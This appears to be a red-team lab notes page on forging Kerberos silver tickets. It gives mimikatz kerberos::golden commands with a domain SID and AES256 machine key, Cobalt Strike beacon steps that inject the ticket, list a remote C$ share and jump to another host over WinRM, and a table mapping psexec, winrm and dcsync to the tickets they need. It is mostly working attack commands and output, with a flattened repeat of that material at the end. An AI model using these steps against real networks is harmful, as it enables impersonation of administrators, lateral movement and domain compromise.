Silver Ticket

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi

# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt

Where:

/user is the username to impersonate. (any user)
/domain is the current FQDN domain name.
/sid is the current domain SID.
/target is the FQDN target machine.
/service is the target service
/rc4 is the NTLM hash of the computer account
/aes256 is the AES256 key for the target machine.
/ticket is the filename to save the ticket as.

beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\srv2-cifs.kirbi
beacon> ls \\srv-2\c$

beacon> rev2self

Technique

Required Service Tickets

psexec

CIFS

winrm

HOST & HTTP

dcsync (DCs only)

LDAP

beacon> run klist

Current LogonId is 0:0x2d3d7

Cached Tickets: (2)

#0>    Client: Administrator @ dev.cyberbotic.io
    Server: host/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:04:19 (local)
    End Time:   5/24/2031 17:04:19 (local)
    Renew Time: 5/24/2031 17:04:19 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

#1>    Client: Administrator @ dev.cyberbotic.io
    Server: http/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:06:34 (local)
    End Time:   5/24/2031 17:06:34 (local)
    Renew Time: 5/24/2031 17:06:34 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

beacon> jump winrm64 srv-2 smb
[+] established link to child beacon: 10.10.17.68

Note: we can use the target machine hash as the service hash for the filesharing service (CIFS).

PreviousSkeleton Key NextGolden Ticket

Last updated 2 years ago

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi # OR kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt

beacon> run klist Current LogonId is 0:0x2d3d7 Cached Tickets: (2) #0> Client: Administrator @ dev.cyberbotic.io Server: host/srv-2 @ dev.cyberbotic.io KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 5/26/2021 17:04:19 (local) End Time: 5/24/2031 17:04:19 (local) Renew Time: 5/24/2031 17:04:19 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: #1> Client: Administrator @ dev.cyberbotic.io Server: http/srv-2 @ dev.cyberbotic.io KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 5/26/2021 17:06:34 (local) End Time: 5/24/2031 17:06:34 (local) Renew Time: 5/24/2031 17:06:34 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: beacon> jump winrm64 srv-2 smb [+] established link to child beacon: 10.10.17.68